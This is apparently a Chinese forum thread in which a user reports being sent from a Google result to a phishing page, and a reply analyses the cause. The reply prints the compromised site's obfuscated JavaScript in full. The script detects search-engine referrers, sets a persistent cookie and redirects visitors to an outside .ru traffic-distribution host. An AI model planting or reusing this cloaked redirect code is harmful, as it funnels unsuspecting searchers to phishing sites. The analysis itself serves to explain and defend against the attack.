第一次在 google.com 被钓鱼

手动重现

Google 搜索 notion dropbox paper： https://www.google.com/search?q=notion+dropbox+paper
然后点结果中的这个钓鱼链接： http://staging.swisse.com.au/dropbox-paper.html
几次跳转后：🎉

录了个 Gif： https://i.imgur.com/KnY04hA.gifv

问题

为什么直接访问这个钓鱼页就不会被钓鱼？通过 refer 判断的吗？
- 在 Google 搜索结果页点击才会被钓鱼（不对，好像是只要有 refer 都行），如果直接访问是正常显示的 notion vs dropbox peper 的一篇东拼西凑的文章。
哪个环节出的问题？
- 应该就是 swisse.com.au 被挂了这个钓鱼页吧？
- 或者 HTTP 被篡改？（但访问 swisse.com.au 人家有 HTTPS 呀）
- 我装的某个 Chrome 插件有问题？
- 或者是我用的代理？

其他网站上（特别是各种色情网站）遇到钓鱼链接倒不稀奇，但在 google.com 上遇到且 Chrome 还没红屏警告的，这是第一次碰到。

一知半解，有大佬分析一下吗？

imdong

2020-03-06 16:03:58 +08:00

不是劫持，就是典型的黑产 SEO 性质的东西。

页面加载了唯一 JS ( http://staging.swisse.com.au/js/stats.js)

```javascript
class Task2 {
static ["com2"]() {
var _0x4014c2 = document.title.split(" - ");

var _0x28236f = _0x4014c2[0].split(" | ");

function _0x19737c(_0x3c4e45, _0x1f88c8, _0x43a6f0, _0x17db9b, _0x142f63, _0x1a5f1a) {
if (!_0x3c4e45 || !_0x1f88c8) return ![];

var _0x3405ea = _0x3c4e45 + '=' + encodeURIComponent(_0x1f88c8);

if (_0x43a6f0) _0x3405ea += "; expires=" + _0x43a6f0.toGMTString();
if (_0x17db9b) _0x3405ea += ';\x20path=' + _0x17db9b;
if (_0x142f63) _0x3405ea += "; domain=" + _0x142f63;
if (_0x1a5f1a) _0x3405ea += "; secure";
document.cookie = _0x3405ea;
return !![];
}

function _0x49f35b(_0x3b366b) {
var _0x2d3ad0 = "(?:; )?" + _0x3b366b + '=([^;]*);?';

var _0x5ede30 = new RegExp(_0x2d3ad0);

if (_0x5ede30.test(document.cookie)) return decodeURIComponent(RegExp.$1);
return ![];
}

function _0x35790f(_0xe10d12, _0x1aca07, _0x43ad37) {
_0x19737c(_0xe10d12, null, new Date(0), _0x1aca07, _0x43ad37);

return !![];
}

var _0x5e520f = {};
_0x5e520f.searchers = [[/google\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.yahoo\./i, /(\?|&)p=(.*?)(&|$)/i, 2], [/bing\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.aol\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2], [/(nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2]];

_0x5e520f.sp_redirect = function (_0xa5e498) {
var _0x50a397 = null;

for (var _0x592205 = 0; _0x592205 < _0x5e520f.searchers['length']; _0x592205++) {
var _0x5da909 = _0x5e520f.searchers[_0x592205];

if (_0xa5e498.match(_0x5da909[0]) || _0x49f35b("opos") == '1') {
_0x19737c("opos", '1');

document.location['href'] = "http://tr.stoneshards.ru/trds?q=" + _0x28236f[0];
break;
}
}
};

_0x5e520f.sp_redirect(document.referrer);
}

}

Task2.com2();
```

只要是来路 referrer 是来自 _0x5e520f.searchers 数组内的网站，就跳转到 tr#stoneshards#ru/trds?q={title}